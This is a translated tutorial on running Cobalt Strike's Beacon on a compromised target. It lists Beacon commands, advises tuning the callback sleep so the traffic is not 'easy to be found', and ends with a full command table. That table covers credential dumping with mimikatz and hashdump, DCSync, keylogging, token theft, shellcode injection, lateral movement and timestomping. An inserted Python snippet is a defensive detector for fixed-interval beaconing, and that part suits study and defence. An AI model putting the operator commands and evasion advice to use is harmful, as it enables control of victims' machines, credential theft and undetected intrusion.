After following tutorial 2 to configure the Listeners and getting the target to execute our payload backdoor program, you will see the target host come online.
Right-click the target and choose to use Beacon, which is what we use to execute the various commands.
==In Cobalt Strike the default heartbeat is 60s (that is, the sleep time is 60s, and the target host communicates with the team server once every minute), which makes executing commands or performing other operations feel slow. This is most noticeable when downloading files, so the response time is generally reduced; in a real engagement, however, it should not be set too small, or the traffic becomes particularly obvious.==
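From the defender's side, the reason a short, fixed sleep makes the traffic "particularly obvious" is that the check-ins arrive at almost constant intervals. The Python below is an added example, not code from the original tutorial: it groups constructed proxy log lines by source/destination pair and flags pairs whose request gaps are nearly constant. The log format, hosts, and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log lines (not real traffic): "timestamp src dst uri".
# 10.0.0.5 checks in roughly every 60s; 10.0.0.6 browses irregularly.
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:01:00 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:02:00 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:02:59 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:04:01 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:05:00 10.0.0.5 203.0.113.10 /updates
2024-01-01T10:00:07 10.0.0.6 198.51.100.2 /index.html
2024-01-01T10:00:09 10.0.0.6 198.51.100.2 /style.css
2024-01-01T10:03:40 10.0.0.6 198.51.100.2 /news
2024-01-01T10:15:02 10.0.0.6 198.51.100.2 /about
2024-01-01T10:16:30 10.0.0.6 198.51.100.2 /contact
"""


def parse_log(text):
    """Group request timestamps by (src, dst) pair."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, _uri = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def interval_stats(times):
    """Return (mean gap in seconds, coefficient of variation) of consecutive requests."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else 0.0)


def find_beacons(text, min_requests=5, max_cv=0.1):
    """Flag (src, dst) pairs with enough requests whose gaps barely vary.

    A low coefficient of variation means a fixed sleep; the hypothetical
    thresholds here (>= 5 requests, CV <= 0.1) are tuning assumptions.
    """
    hits = {}
    for pair, times in parse_log(text).items():
        if len(times) < min_requests:
            continue
        m, cv = interval_stats(times)
        if cv <= max_cv:
            hits[pair] = round(m, 1)  # record the estimated sleep interval
    return hits
```

Running `find_beacons(SAMPLE_LOG)` reports only the 10.0.0.5 pair with an estimated 60s interval, which is exactly the default sleep the tutorial describes.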
Beacon differs from cmd in that many commands cannot be entered directly. For example, to view the IP address in cmd you can type ipconfig directly, but in Beacon you need to enter shell ipconfig to see it. We will not dig deeper into this here.
The commands that can be used directly in beacon are as follows:
help: view help for all built-in commands of the Beacon shell. To view the usage of a specific command, eg: help checkin
note: give a name to the current machine, eg: note chicken1
cd: switch directories on the target system. Note that on Windows you need to use double backslashes to switch directories, or use '/', eg: cd c:\
mkdir: create a new directory, eg: mkdir d:\beacon
rm: delete a file or directory, eg: rm d:\beacon
upload: upload a file to the target system
download: download the specified file from the target system, eg: download C:\payload.txt
cancel: cancel a download task. For example, if a file is very large and the download takes a very long time, you can use this command to cancel it midway
shell: execute the specified cmd command on the target system, eg: shell whoami
getuid: view the user permissions of the current Beacon session on the target system. If necessary, you need to raise the permissions.
pwd: view the path of the current directory on the target system
ls: list all files and directories in the current directory
drives: list all partitions on the target system
ps: view the current list of all processes on the target system
kill: kill the specified process, eg: kill 6453
sleep: specify the sleep time of the controlled end. By default the callback time is 60s; you can use sleep 10 to change it. In practice it should not be too fast, or it is easy to be found. Generally, the callback time is 80s
jobs: list all tasks. Some tasks may take a little longer to execute; at this time you can see the id of the specific task in the task list and clear it individually
jobkill: if you find that a task has not executed for a long time or is abnormal, you can use this command to end the task directly, eg: jobkill 3456
clear: clear the task queue inside the Beacon
checkin: force the controlled end to call back once
exit: terminate the current Beacon session
ctrl + k: clear the screen
The full command list, with the descriptions translated from the Chinese reference, is as follows:
| Command | Description |
| ------- | ----------- |
| browserpivot | Inject into the victim's browser process |
| bypassuac | Bypass UAC |
| cancel | Cancel a download in progress |
| cd | Change directory |
| checkin | Force the controlled end to call back once |
| clear | Clear Beacon's internal task queue |
| connect | Connect to a Beacon peer over TCP |
| covertvpn | Deploy a Covert VPN client |
| cp | Copy file |
| dcsync | Extract password hashes from the DC |
| desktop | Remote VNC |
| dllinject | Reflective DLL injection into a process |
| dllload | Load a DLL into a process using LoadLibrary |
| download | Download file |
| downloads | List file downloads in progress |
| drives | List target drive letters |
| elevate | Attempt privilege escalation |
| execute | Execute a program on the target (no output) |
| execute-assembly | Execute a local .NET program in memory on the target |
| exit | Exit the Beacon |
| getprivs | Enable system privileges on the current token |
| getsystem | Attempt to get SYSTEM privileges |
| getuid | Get user ID |
| hashdump | Dump password hashes |
| help | Help |
| inject | Spawn a session in a specific process |
| jobkill | Kill a background task |
| jobs | List background tasks |
| kerberos_ccache_use | Import tickets from a ccache file and apply them to this session |
| kerberos_ticket_purge | Clear the tickets for the current session |
| kerberos_ticket_use | Import tickets from a ticket file and apply them to this session |
| keylogger | Keylogger |
| kill | End process |
| link | Connect to a Beacon peer over a named pipe |
| logonpasswords | Dump credentials and hashes using mimikatz |
| ls | List files |
| make_token | Create a token to pass credentials |
| mimikatz | Run a mimikatz function |
| mkdir | Create a directory |
| mode dns | Use DNS A records as the communication channel (DNS Beacon only) |
| mode dns-txt | Use DNS TXT records as the communication channel (DNS Beacon only) |
| mode dns6 | Use DNS AAAA records as the communication channel (DNS Beacon only) |
| mode http | Use HTTP as the communication channel |
| mv | Move file |
| net | net command |
| note | Remarks |
| portscan | Port scan |
| powerpick | Execute a command via Unmanaged PowerShell |
| powershell | Execute a command via powershell.exe |
| powershell-import | Import a PowerShell script |
| ppid | Set the parent PID for spawned post-ex jobs |
| ps | Show process list |
| psexec | Use a service to spawn a session on a host |
| psexec_psh | Use PowerShell to spawn a session on a host |
| psinject | Execute a PowerShell command in a specific process |
| pth | Pass-the-hash using Mimikatz |
| pwd | Current directory location |
| reg | Query the registry |
| rev2self | Revert to the original token |
| rm | Delete files or folders |
| rportfwd | Port forwarding |
| run | Execute a program on the target (returns output) |
| runas | Execute a program with another user's rights |
| runasadmin | Execute a program with high privileges |
| runu | Execute a program under another PID |
| screenshot | Take a screenshot |
| setenv | Set environment variables |
| shell | Execute a command via cmd |
| shinject | Inject shellcode into a process |
| shspawn | Spawn a process and inject shellcode into it |
| sleep | Set the sleep delay time |
| socks | Start a SOCKS4 proxy |
| socks stop | Stop the SOCKS4 proxy |
| spawn | Spawn a session |
| spawnas | Spawn a session as another user |
| spawnto | Set the executable to spawn processes into |
| spawnu | Spawn a session under another PID |
| ssh | Connect to a remote host using SSH |
| ssh-key | Connect to a remote host using an SSH key |
| steal_token | Steal a token from a process |
| timestomp | Apply a file's timestamp to another file |
| unlink | Disconnect from the parent Beacon |
| upload | Upload files |
| wdigest | Dump plaintext credentials using mimikatz |
| winrm | Spawn a session on a host using WinRM |
| wmi | Spawn a session on a host using WMI |
| argue | Process argument spoofing |